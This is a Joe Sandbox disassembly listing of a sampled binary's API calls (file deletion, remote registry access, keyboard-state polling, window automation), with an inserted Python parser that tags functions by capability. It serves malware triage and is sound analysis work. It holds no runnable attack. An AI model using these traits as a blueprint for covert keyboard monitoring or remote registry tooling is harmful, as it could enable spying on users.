                                                                              • Part of subcall function 002D9CF1: _wcscmp.LIBCMT ref: 002D9DE1
                                                                              • Part of subcall function 002D9CF1: _wcscmp.LIBCMT ref: 002D9DF4
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002D9A0D
                                                                            • _wcsncpy.LIBCMT ref: 002D9A80
                                                                            • DeleteFileW.KERNEL32(?,?), ref: 002D9AB6
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002D9ACC
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D9ADD
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D9AEF
                                                                            Similarity
                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 1500180987-0
                                                                            • Opcode ID: 04d8efc64ab8aba29e3ea24d634f8ec50ae5796c181e8ae0695242aff8e7cbe8
                                                                            • Instruction ID: 54a7a9e70fb9cbffa8dfd8881a455640ce54d9cb2758dde4dd533bf07b696e21
                                                                            • Opcode Fuzzy Hash: 04d8efc64ab8aba29e3ea24d634f8ec50ae5796c181e8ae0695242aff8e7cbe8
                                                                            • Instruction Fuzzy Hash: 1CC13CB1910219ABDF15EF95CC85ADEB7BDAF44300F0040ABF609E6251EB709E948F65
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00285BF1
                                                                            • GetMenuItemCount.USER32(00337890), ref: 002C0E7B
                                                                            • GetMenuItemCount.USER32(00337890), ref: 002C0F2B
                                                                            • GetCursorPos.USER32(?), ref: 002C0F6F
                                                                            • SetForegroundWindow.USER32(00000000), ref: 002C0F78
                                                                            • TrackPopupMenuEx.USER32(00337890,00000000,?,00000000,00000000,00000000), ref: 002C0F8B
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002C0F97
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 2751501086-0
                                                                            • Opcode ID: 1aa2dd22d6a4148a5e28d3e3ef1759ecba055f3a687772f13df400f2afa52a79
                                                                            • Instruction ID: 27df5806d7b957be4a158d729f6616b83c5530a2d5a19f85146a1d59d2eee46f
                                                                            • Opcode Fuzzy Hash: 1aa2dd22d6a4148a5e28d3e3ef1759ecba055f3a687772f13df400f2afa52a79
                                                                            • Instruction Fuzzy Hash: 6471E07066561AFEEB259F54CC85FAABF68FB04724F20021AF528661D1CBB16870DF90
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,00300980), ref: 002DAF4E
                                                                            • GetDriveTypeW.KERNEL32(00000061,0032B5F0,00000061), ref: 002DB018
                                                                            • _wcscpy.LIBCMT ref: 002DB042
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                            • String ID: L,0$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2820617543-3005478051
                                                                            • Opcode ID: 747aec761f9ae3f28fb27157a91decc693839904c1cd9cdf22ba4677e4b8be8d
                                                                            • Instruction ID: 31130fd26178d8ec5c7716d1bfb2a8123b9bfb59a3eb5c9310cf0e7c0547740e
                                                                            • Opcode Fuzzy Hash: 747aec761f9ae3f28fb27157a91decc693839904c1cd9cdf22ba4677e4b8be8d
                                                                            • Instruction Fuzzy Hash: BF51DE701283059FC715EF14D891AAAB7A9EF95300F20881EF4995B2E2DB71ED29CF52
                                                                            APIs
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • _memset.LIBCMT ref: 002C8489
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002C84BE
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002C84DA
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002C84F6
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002C8520
                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002C8548
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C8553
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C8558
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 1411258926-22481851
                                                                            • Opcode ID: 2dfa6b1d72a8076d54478d4d1b7b5bef7028f6f4d45e64d2489ba15037b1fdc8
                                                                            • Instruction ID: a9b9ccf7e8dc67510c6c7fac7495c8facd20502f501e37342883f10fbf514f94
                                                                            • Opcode Fuzzy Hash: 2dfa6b1d72a8076d54478d4d1b7b5bef7028f6f4d45e64d2489ba15037b1fdc8
                                                                            • Instruction Fuzzy Hash: FE410976C2122DABCF15EFA4DC55EEDB7B8FF04340F00416AE905A21A1EA305D25CF90
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-909552448
                                                                            • Opcode ID: fc8f0a099c344c0d003e560ec7c666059f2953454f9832f08082729eb9e728ac
                                                                            • Instruction ID: be4608dedf2589c77ae61bbaf95e84389c89aacdaf7c7292a4dd138b1a996987
                                                                            • Opcode Fuzzy Hash: fc8f0a099c344c0d003e560ec7c666059f2953454f9832f08082729eb9e728ac
                                                                            • Instruction Fuzzy Hash: C541263453026ECBDF05EF90E891AEA7724EF55380FA04425ED525B292DB30ED7ACB61
                                                                            APIs
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                              • Part of subcall function 0028153B: _memmove.LIBCMT ref: 002815C4
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002D58EB
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002D5901
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002D5912
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002D5924
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002D5935
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_memmove
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 2279737902-1007645807
                                                                            • Opcode ID: 8ed14307549319bfec962ea37253e00cdbcee6845e0ca1c7d27f9939a1dc164f
                                                                            • Instruction ID: 346fe64ca7b3e61ffac9a0a9efc41d45cf4530950bae7ca03819700f2a6ce58f
                                                                            • Opcode Fuzzy Hash: 8ed14307549319bfec962ea37253e00cdbcee6845e0ca1c7d27f9939a1dc164f
                                                                            • Instruction Fuzzy Hash: D811B235961139B9D720F7A1EC5ADFFAB7CEB91B50F80042AB901A30D0DEB01D25CAE0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 208665112-3771769585
                                                                            • Opcode ID: 55eb8056f13f890279630a478e205f1ad9dc4b5a4a04148c8b84c3b65be0fc6a
                                                                            • Instruction ID: e65cc55ec920a4ad0c7e8efe87a06a04208875306d61d06d50fa3045ca537a87
                                                                            • Opcode Fuzzy Hash: 55eb8056f13f890279630a478e205f1ad9dc4b5a4a04148c8b84c3b65be0fc6a
                                                                            • Instruction Fuzzy Hash: FC113631535119ABCF16BB64DC4AEEA77BCDF40710F0041A7F408922A1EF709EA58F90
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 002D5535
                                                                              • Part of subcall function 0029083E: timeGetTime.WINMM(?,00000002,0027C22C), ref: 00290842
                                                                            • Sleep.KERNEL32(0000000A), ref: 002D5561
                                                                            • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 002D5585
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002D55A7
                                                                            • SetActiveWindow.USER32 ref: 002D55C6
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002D55D4
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 002D55F3
                                                                            • Sleep.KERNEL32(000000FA), ref: 002D55FE
                                                                            • IsWindow.USER32 ref: 002D560A
                                                                            • EndDialog.USER32(00000000), ref: 002D561B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 83660d350937e8f6c91bd32429ebd3731fb2b7083db45c384ef05e544fb80bef
                                                                            • Instruction ID: 6da1cbad649ca18212760e86467bf19ae48b4710a83764c4f59eef81656b4c28
                                                                            • Opcode Fuzzy Hash: 83660d350937e8f6c91bd32429ebd3731fb2b7083db45c384ef05e544fb80bef
                                                                            • Instruction Fuzzy Hash: B321A170215705AFFB575F60ECD9B263B6EEB46346F40141BF401822A1CFB18E60DB62
                                                                            APIs
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • CoInitialize.OLE32(00000000), ref: 002DDC2D
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002DDCC0
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 002DDCD4
                                                                            • CoCreateInstance.OLE32(00303D4C,00000000,00000001,0032B86C,?), ref: 002DDD20
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002DDD8F
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 002DDDE7
                                                                            • _memset.LIBCMT ref: 002DDE24
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 002DDE60
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002DDE83
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 002DDE8A
                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002DDEC1
                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 002DDEC3
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                            • String ID:
                                                                            • API String ID: 1246142700-0
                                                                            • Opcode ID: e8c8ba9106561172fe7cbcecfe484cb73c7827515953e58f13839f0e0af2526a
                                                                            • Instruction ID: 024ee0a964ae8bfe105f57e963e614c643130410214c4e9600ba7a9fdec0cd8c
                                                                            • Opcode Fuzzy Hash: e8c8ba9106561172fe7cbcecfe484cb73c7827515953e58f13839f0e0af2526a
                                                                            • Instruction Fuzzy Hash: BFB1E775A10509AFDB04EFA4C889EAEBBB9EF48304F14845AE909EB351DB30AD51CF50
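Added example, not part of the Joe Sandbox report or of the analysed sample: a small Python parser for the "APIs" function blocks in this listing. It splits each block into its API calls (name, module, arguments, reference address, and whether the line is a "Part of subcall function" entry), its String ID entries and its fuzzy hashes, then tags the function by the capabilities its imports suggest and decodes the virtual-key codes polled by the Get*KeyState calls. The capability groupings are this example's own assumption; the VK_ names are standard Windows constants. The embedded sample text is excerpted from the registry-probing block above and the keyboard-state block that follows, with the report's indentation trimmed.

```python
"""Parse Joe Sandbox 'APIs' function blocks and tag each function by capability.

Added example for triaging the disassembly listing on this page. The line
format is the report's own; the capability map is an assumption made here.
"""
import re
from dataclasses import dataclass, field

# One API call line, e.g. "• RegOpenKeyExW.ADVAPI32(?,?,00000000), ref: 002C84F6"
# or "• Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
FIELD_LINE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*)$")

# Assumed grouping of imports into capabilities (this example's choice, not the report's).
CAPABILITIES = {
    "keyboard_state": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState", "SetKeyboardState"},
    "remote_registry": {"RegConnectRegistryW", "WNetAddConnection2W"},
    "registry": {"RegOpenKeyExW", "RegQueryValueExW", "RegCloseKey"},
    "file_ops": {"DeleteFileW", "CopyFileW"},
}
# Windows virtual-key constants for the codes that appear in the listing.
VK_NAMES = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: str = ""  # callee address when the line is a "Part of subcall function" entry


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_id: str = ""
    opcode_hash: str = ""
    instruction_hash: str = ""


def parse_blocks(text):
    """Split report text into FunctionBlocks; every 'APIs' header opens a new block."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            args = raw.split(",") if raw is not None else []
            current.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                         m.group("ref"), m.group("sub") or ""))
            continue
        m = FIELD_LINE.match(line)
        if m:
            key, val = m.group("key"), m.group("val").strip()
            if key == "API ID":
                current.api_id = val
            elif key == "String ID":
                # '$' is the report's separator, so a literal '$' (e.g. the IPC$ share) is lost here.
                current.strings = [s for s in val.split("$") if s]
            elif key == "Opcode Fuzzy Hash":
                current.opcode_hash = val
            else:
                current.instruction_hash = val
    return blocks


def tag_capabilities(block):
    """Capabilities implied by the block's own imports (subcall entries excluded)."""
    names = {c.name for c in block.calls if not c.subcall_of}
    return sorted(cap for cap, apis in CAPABILITIES.items() if names & apis)


def polled_keys(block):
    """Decode the first argument of every Get*KeyState call to its VK_ name."""
    keys = set()
    for c in block.calls:
        if c.name in ("GetAsyncKeyState", "GetKeyState") and c.args:
            code = int(c.args[0], 16)
            keys.add(VK_NAMES.get(code, f"VK_{code:02X}"))
    return sorted(keys)


# Excerpt of two blocks from this listing (indentation trimmed).
SAMPLE = r"""
APIs
  • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
• _memset.LIBCMT ref: 002C8489
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002C84BE
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002C84DA
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002C84F6
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002C8520
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002C8548
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C8553
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C8558
Strings
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• Opcode Fuzzy Hash: 2dfa6b1d72a8076d54478d4d1b7b5bef7028f6f4d45e64d2489ba15037b1fdc8
APIs
• GetKeyboardState.USER32(?), ref: 002D0896
• SetKeyboardState.USER32(?), ref: 002D0901
• GetAsyncKeyState.USER32(000000A0), ref: 002D0921
• GetKeyState.USER32(000000A0), ref: 002D0938
• GetAsyncKeyState.USER32(000000A1), ref: 002D0967
• GetKeyState.USER32(000000A1), ref: 002D0978
• GetAsyncKeyState.USER32(00000011), ref: 002D09A4
• GetKeyState.USER32(00000011), ref: 002D09B2
• GetAsyncKeyState.USER32(00000012), ref: 002D09DB
• GetKeyState.USER32(00000012), ref: 002D09E9
• GetAsyncKeyState.USER32(0000005B), ref: 002D0A12
• GetKeyState.USER32(0000005B), ref: 002D0A20
"""

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(b.opcode_hash[:16] or "(no hash)", tag_capabilities(b), polled_keys(b))
```

Run it against the full report text (copy the listing into a file and pass it to parse_blocks) to get one FunctionBlock per "APIs" header; the Opcode Fuzzy Hash is the field to compare across dumps, since the Instruction Fuzzy Hash changes with addresses. Note the String ID caveat in the code: the report joins strings with "$", so a share name such as IPC$ cannot be told apart from the separator.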
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 002D0896
                                                                            • SetKeyboardState.USER32(?), ref: 002D0901
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 002D0921
                                                                            • GetKeyState.USER32(000000A0), ref: 002D0938
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 002D0967
                                                                            • GetKeyState.USER32(000000A1), ref: 002D0978
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 002D09A4
                                                                            • GetKeyState.USER32(00000011), ref: 002D09B2
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 002D09DB
                                                                            • GetKeyState.USER32(00000012), ref: 002D09E9
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 002D0A12
                                                                            • GetKeyState.USER32(0000005B), ref: 002D0A20
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 42a25d1886d3af84ac87f5ff29d8a8df8432cb8169f4f15b2ea85d8a3fc953ce
                                                                            • Instruction ID: 2f2ad9287381334a65918af9f7a231aaf0fb2ac9bd55ff200a67815a9cd63b35
                                                                            • Opcode Fuzzy Hash: 42a25d1886d3af84ac87f5ff29d8a8df8432cb8169f4f15b2ea85d8a3fc953ce
                                                                            • Instruction Fuzzy Hash: 8451D92091478929FB35DFB088907EABFB49F01780F08459F85C2577D3DA649E6CCBA1
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 002CCE1C
                                                                            • GetWindowRect.USER32(00000000,?), ref: 002CCE2E
                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002CCE8C
                                                                            • GetDlgItem.USER32(?,00000002), ref: 002CCE97
                                                                            • GetWindowRect.USER32(00000000,?), ref: 002CCEA9
                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002CCEFD
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 002CCF0B
                                                                            • GetWindowRect.USER32(00000000,?), ref: 002CCF1C
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002CCF5F
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 002CCF6D
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002CCF8A
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002CCF97
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 3e23ce89239d94bef00296327e442beaff60c283f8eaec16120e12076bd7c980
                                                                            • Instruction ID: b03d558ce8c347646f3b09c8cde22c8daf1b2a38946b326505e233e790f35e24
                                                                            • Opcode Fuzzy Hash: 3e23ce89239d94bef00296327e442beaff60c283f8eaec16120e12076bd7c980
                                                                            • Instruction Fuzzy Hash: 32515371B10209AFDB18CF68CD95FAEBBBAEB88710F14822DF519D7290DB709D108B50
                                                                            APIs
                                                                              • Part of subcall function 002729AB: GetWindowLongW.USER32(?,000000EB), ref: 002729BC
                                                                            • GetSysColor.USER32(0000000F), ref: 002725AF
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: ee648b3d59f4a2c5462f85faf473ddf5c181ac6b421fb274c5157ec461609d13
                                                                            • Instruction ID: 0ebcc3fa6748816199f2c5ac72189122b7248d311192b6e2f578fe1bd31a0a14
                                                                            • Opcode Fuzzy Hash: ee648b3d59f4a2c5462f85faf473ddf5c181ac6b421fb274c5157ec461609d13
                                                                            • Instruction Fuzzy Hash: 2041F630015105EFDB295F28DC98BB93769FB0A331F188262FD698E1E5CB708C55DB21
                                                                            APIs
                                                                              • Part of subcall function 00290B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00282A3E,?,00008000), ref: 00290BA7
                                                                              • Part of subcall function 00290284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00282A58,?,00008000), ref: 002902A4
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00282ADF
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00282C2C
                                                                              • Part of subcall function 00283EBE: _wcscpy.LIBCMT ref: 00283EF6
                                                                              • Part of subcall function 0029386D: _iswctype.LIBCMT ref: 00293875
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                            • API String ID: 537147316-3738523708
                                                                            • Opcode ID: 83c13bb7d4fe2c501a3e96d4aa670621171b07dd5aa0a2b9179232c939c39d21
                                                                            • Instruction ID: 74a6a85c2957be95c85c442ea747c82eadcd47f36c2c4170350725968d08acbf
                                                                            • Opcode Fuzzy Hash: 83c13bb7d4fe2c501a3e96d4aa670621171b07dd5aa0a2b9179232c939c39d21
